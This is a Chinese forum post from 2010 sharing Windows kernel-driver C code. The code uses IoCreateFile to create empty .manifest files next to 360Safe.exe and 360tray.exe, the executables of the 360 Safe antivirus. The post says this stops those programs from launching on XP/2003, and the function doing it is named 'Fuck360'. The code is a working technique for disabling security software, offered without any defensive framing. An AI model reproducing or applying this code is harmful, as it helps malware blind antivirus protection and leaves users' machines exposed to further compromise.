|
|
本帖最后由 HoviDelphic 于 2010-5-2 11:03 编辑
创建.manifest文件,可以在XP/03下阻止程序启动。
- NTKERNELAPI NTSTATUS IoCreateFile
- (
- __out PHANDLE FileHandle,
- __in ACCESS_MASK DesiredAccess,
- __in POBJECT_ATTRIBUTES ObjectAttributes,
- __out PIO_STATUS_BLOCK IoStatusBlock,
- __in_opt PLARGE_INTEGER AllocationSize,
- __in ULONG FileAttributes,
- __in ULONG ShareAccess,
- __in ULONG CreateDisposition,
- __in ULONG CreateOptions,
- __in PVOID EaBuffer,
- __in_opt ULONG EaLength,
- __in CREATE_FILE_TYPE CreateFileType,
- __in PVOID InternalParameters,
- __in ULONG Options
- );
- VOID DrvCreateFile(UNICODE_STRING *pusFilePath)
- {
- HANDLE hfile;
- IO_STATUS_BLOCK IoSB;
- OBJECT_ATTRIBUTES ObjA;
- InitializeObjectAttributes(&ObjA,pusFilePath,OBJ_CASE_INSENSITIVE,NULL,NULL);
- IoCreateFile(&hfile,
- GENERIC_WRITE,
- &ObjA,
- &IoSB,
- NULL,
- FILE_ATTRIBUTE_NORMAL,
- 0,
- FILE_OPEN_IF,
- FILE_SYNCHRONOUS_IO_NONALERT,
- NULL,
- 0,
- 0,
- NULL,
- IO_NO_PARAMETER_CHECKING);
- ZwClose(hfile);
- }
- VOID Fuck360()
- {
- UNICODE_STRING make;
- RtlInitUnicodeString(&make,L"\\??\\C:\\Program Files\\360\\360safe\\360Safe.exe.manifest");
- DrvCreateFile(&make);
- RtlInitUnicodeString(&make,L"\\??\\C:\\Program Files\\360\\360safe\\safemon\\360tray.exe.manifest");
- DrvCreateFile(&make);
- }
|
|
发表于 2010-1-13 01:18:13
